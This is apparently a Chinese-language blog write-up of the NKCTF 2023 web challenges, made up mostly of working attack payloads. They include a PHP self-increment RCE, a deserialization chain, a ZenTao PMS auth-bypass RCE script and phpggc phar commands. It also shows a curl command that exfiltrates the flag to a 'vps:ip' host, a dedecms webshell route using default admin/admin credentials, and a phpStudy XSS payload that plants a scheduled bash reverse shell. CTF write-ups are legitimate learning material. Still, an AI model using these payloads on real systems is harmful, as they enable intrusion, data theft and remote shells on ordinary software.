^-^
2023NKCTF-WEB
  1. Web
    1. eazy_php
    2. baby_php
    3. easy_pms
    4. hard_php
    5. webpagetest
    6. easy_cms
    7. xiaopi

Web

大多数是可以在网上找到poc和文章,跟着打就行的,没有喜欢的那种代码审计题(XD)

eazy_php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php 
    highlight_file(__FILE__);
    error_reporting(0);
    if($_GET['a'] != $_GET['b'] && md5($_GET['a']) == md5($_GET['b'])){
        if((string)$_POST['c'] != (string)$_POST['d'] && sha1($_POST['c']) === sha1($_POST['d'])){
            if($_GET['e'] != 114514 && intval($_GET['e']) == 114514){
                if(isset($_GET['NS_CTF.go'])){
                    if(isset($_POST['cmd'])){
                        if(!preg_match('/[0-9a-zA-Z]/i', $_POST['cmd'])){
                            eval($_POST['cmd']);
                        }else{
                            die('error!!!!!!');
                        }
                    }else{
                        die('error!!!!!');
                    }
                }else{
                    die('error!!!!');
                }
            }else{
                die('error!!!');
            }
        }else{
            die('error!!');
        }
    }else{
        die('error!');
    }
?> error!

简单分析一下

  • md5数组绕过
  • sha1碰撞
  • php弱类型,114514.9!=114514,intval(‘114514.9’)==114514
  • php参数规范化,如果参数名里面带有[,.等字符,会自动转换为_,但是只会转换一次,所以使用NS[CTF.go就会转换为NS_CTF.go
  • 自增rce

数据包如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /?a[]=1&b[]=2&e=114514.9&NS[CTF.go=1 HTTP/1.1
Host: a966893b-3e1a-4e54-b576-29f8a7f571cc.node2.yuzhian.com.cn
Content-Length: 2568
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://a966893b-3e1a-4e54-b576-29f8a7f571cc.node2.yuzhian.com.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://nkctf.yuzhian.com.cn:8000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.1935970464.1678703074; _ga_KCSGQQ51ER=GS1.1.1679725242.12.1.1679727705.0.0.0
Connection: close

c=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&d=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&cmd=$_=[].[];$_=$_['!'=='$'];$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$___=$__;$_____=$__;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$___.=$_____;$___.=$__;$__%2B%2B;$___.=$__;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$___.=$_;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$___.=$_;$____='_';$_=[].[];$_=$_['!'=='$'];$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$_=$$____;$___($_[_]);&_=cat /f*

baby_php

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php
    error_reporting(0);
    class Welcome{
        public $name;
        public $arg = 'oww!man!!';
        public function __construct(){
            $this->name = 'ItS SO CREAZY';
        }
        public function __destruct(){
            if($this->name == 'welcome_to_NKCTF'){
                echo $this->arg;
            }
        }
    }

    function waf($string){
        if(preg_match('/f|l|a|g|\*|\?/i', $string)){
            die("you are bad");
        }
    }
    class Happy{
        public $shell;
        public $cmd;
        public function __invoke(){
            $shell = $this->shell;
            $cmd = $this->cmd;
            waf($cmd);
            eval($shell($cmd));
        }
    }
    class Hell0{
        public $func;
        public function __toString(){
            $function = $this->func;
            $function();
        }
    }

    if(isset($_GET['p'])){
        unserialize($_GET['p']);
    }else{
        highlight_file(__FILE__);
    }
?>

一个简单的反序列化,但是命令执行的时候需要绕一下

使用eval(urldecode(xxx))的方式来绕过检测,需要进行二次url编码

system('cat /f1ag');=>%73%79%73%74%65%6D%28%27%63%61%74%20/%66%31%61%67%27%29%3B

/的url编码为%2F,会被过滤,所以需要注意一下,不要编码/

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
class Welcome
{
    public $name;
    public $arg = 'oww!man!!';
}
class Happy{
    public $shell;
    public $cmd;
}
class Hell0{
    public $func;
}
$a=new Welcome();
$b=new Hell0();
$c=new Happy();
$a->name=$b;
$b->func=$c;
$c->shell="urldecode";
$c->cmd="%73%79%73%74%65%6D%28%27%63%61%74%20/%66%31%61%67%27%29%3B";
echo urlencode(serialize($a));

easy_pms

就是禅道的一个rce漏洞,网上有poc,直接用就行zentaopms_poc

只不过注意一下,他命令执行只有返回一行,所以需要将他base64编码一一下

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# -*- coding: UTF-8 -*-
# !/usr/bin/python

'''
权限绕过+RCE POC 伪静态传参版
禅道系统 影响版本 安全版本
开源版 17.4以下的未知版本<=version<=18.0.beta1 18.0.beta2
旗舰版 3.4以下的未知版本<=version<=4.0.beta1 4.0.beta2
企业版 7.4以下的未知版本<=version<=8.0.beta1 8.0.beta2
'''
import requests

proxies = {
    #"http": "127.0.0.1:8080",
    #"https": "127.0.0.1:8080",
}
def check(url):
    # url="http://10.211.55.3:8008"
    url1 = url+'/misc-captcha-user.html'
    # url1 = url+'/index.php?m=misc&f=captcha&sessionVar=user'#非伪静态版本按照此格式传参
    # url2 = url+'/index.php?m=block&f=printBlock&id=1&module=my'#可判断验证绕过的链接
    url3 = url + 'repo-create.html'
    url4 = url + 'repo-edit-10000-10000.html'
    headers={
        "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language":"zh-CN,zh;q=0.9",
        "Cookie":"zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
    }

    headers2 = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
        "Content-Type":"application/x-www-form-urlencoded",
        "X-Requested-With":"XMLHttpRequest",
        "Referer":url+"/repo-edit-1-0.html"
    }

    data1 = 'product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid='
    data2 = 'SCM=Subversion&client=`tac /f*|base64`'
    s=requests.session()
    try:
        req1 = s.get(url1,proxies=proxies,timeout=5,verify=False,headers=headers)
        req3 = s.post(url3,data=data1,proxies=proxies,timeout=5,verify=False,headers=headers2)
        req4 = s.post(url4,data=data2,proxies=proxies,timeout=5,verify=False,headers=headers2)
        print(req4.text)
        if 'uid=' in req4.text:
            print(url,"")
            print(req4.text)
            return True
    except Exception as e:
        print(e)
    return False
if __name__ == '__main__':
    print(check("http://1e43db25-38e4-4fd7-b7d3-bd7ba773eb58.node2.yuzhian.com.cn/"))

hard_php

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
// not only ++
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['NKCTF'])) {
    $NK = $_POST['NKCTF'];
    if (is_string($NK)) {
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$NK) && strlen($NK) < 105){
            eval($NK);
        }else{
            echo("hacker!!!");
        }
    }else{
        phpinfo();
    }
}
?>

跟ctfshow之前举办的一个极限rce挑战很像

直接上payload,要用burp发包

1
%91=phpinfo&%92=1&NKCTF=$_=(%99/%99.%99)[_];$%81=%2b%2b$_;$%81=_.%2b%2b$_.$%81[$_%2b%2b/$_%2b%2b].%2b%2b$_.%2b%2b$_;$$%81[%91]($$%81[%92]);

但是查看phpinfo可以发现他过滤了几个函数passthru,exec,system

image-20230326173351704

没有过滤shell_exec

因为这个不会回显,所以通过wget或者curl的方法来外带数据到vps上

1
2
curl http://vps:ip/`ls`
curl http://vps:ip/`cat /f*|base64`
1
%91=shell_exec&%92=curl http://vps:ip/`cat /f*|base64`&NKCTF=$_=(%99/%99.%99)[_];$%81=%2b%2b$_;$%81=_.%2b%2b$_.$%81[$_%2b%2b/$_%2b%2b].%2b%2b$_.%2b%2b$_;$$%81[%91]($$%81[%92]);

在burp里面要将空格进行url编码

vps开启监听,然后发包,在vps里可以获得flag

webpagetest

他的反序列化漏洞,参考webpagetest反序列化及ssrf漏洞分析

下载phpggc后,直接跟着文章的内容打就行

1
2
3
4
5
6
7
./phpggc Monolog/RCE2 system 'cat /f*' -p phar -o testinfo.ini
#进行url编码
URLENC_PAYLOAD=$(cat testinfo.ini | xxd -p | tr -d "\n" | sed "s#..#%&#g")
#写入文件
curl -sSkig 'http://737a43c3-7c8c-4a50-a4ea-230507a1d702.node2.yuzhian.com.cn/runtest.php' -d 'rkey=gadget' -d "ini=$URLENC_PAYLOAD" -o -
#触发反序列化
curl -sSkig 'http://737a43c3-7c8c-4a50-a4ea-230507a1d702.node2.yuzhian.com.cn/runtest.php' -d 'rkey=phar:///var/www/html/results/gadget./testinfo.ini/foo' -d "ini=$URLENC_PAYLOAD" -o -

image-20230326174415718

easy_cms

dedecms

找到后台路径/dede

dedecms的默认密码为admin/admin,直接登录

直接上传文件写马会被检测,又网上找了好多种后台getshell方法,但是都不如意

最后还是使用写马的方式,利用字符串拼接来绕过检测

在这里可以大概知道他会检测什么

image-20230326174636307

然后在文件式管理器上传文件

image-20230326174726180

发现他会过滤file_put_contents等一些函数,我记得在做的时候是使用字符串拼接来执行和file_put_contents来写文件执行命令的,但是在写wp的时候不知道为什么就不行了XD

因为是ctf,所以只要得到flag就行

新建以下文件

查看flag名

1
2
<?php
var_dump(scandir("/"));

image-20230326193758690

读取flag

1
2
<?php
echo file_get_contents("/f1Aggg");

image-20230326193849811

xiaopi

小皮面板rce,参考【漏洞复现】phpStudy 小皮 Windows面板 RCE漏洞

打开靶机会显示404

本地安装一下小皮面板,对登录进行抓包,发现有个X-Requested-With: XMLHttpRequest

image-20230326190909293

这种头部带上X-Requested-With:XMLHttpRequest的是 Ajax 异步请求。

所以加上这个http头,可以发现正常回显

image-20230326191148188

然后就是要上面文章里的poc

直接使用bash来弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
function poc(){
  $.get('/service/app/tasks.php?type=task_list',{},function(data){
    var id=data.data[0].ID;
    $.post('/service/app/tasks.php?type=exec_task',{
      tid:id
    },function(res2){
        $.post('/service/app/log.php?type=clearlog',{
            
        },function(res3){},"json");
        
      
    },"json");
  },"json");
}
function save(){
  var data=new Object();
  data.task_id="";
  data.title="test";
  data.exec_cycle="1";
  data.week="1";
  data.day="3";
  data.hour="14";
  data.minute = "20";
  data.shell='bash -c"bash -i >& /dev/tcp/ip/port 0>&1"';
  $.post('/service/app/tasks.php?type=save_shell',data,function(res){
    poc();
  },'json');
}
save();

然后把文件放在vps里,用python开启一个简易服务,python3 -m -http.server

然后在登录框内,用户名填写为<script src="http://vpsip:port/shell.js"></script>,密码随便填,然后vps开启监听,等bot登录,就会执行shell.js来创建一个计划任务,从而反弹shell

image-20230326191906374

image-20230326192117721

image-20230326192138896

2024-03-01 该篇文章被 v2ish1yan 打上标签: CTF 归为分类: WP

© 1949-2024 China
🌊面朝大海,春暖花开🌸 本站由Hexo驱动|使用Hexo-theme-A4主题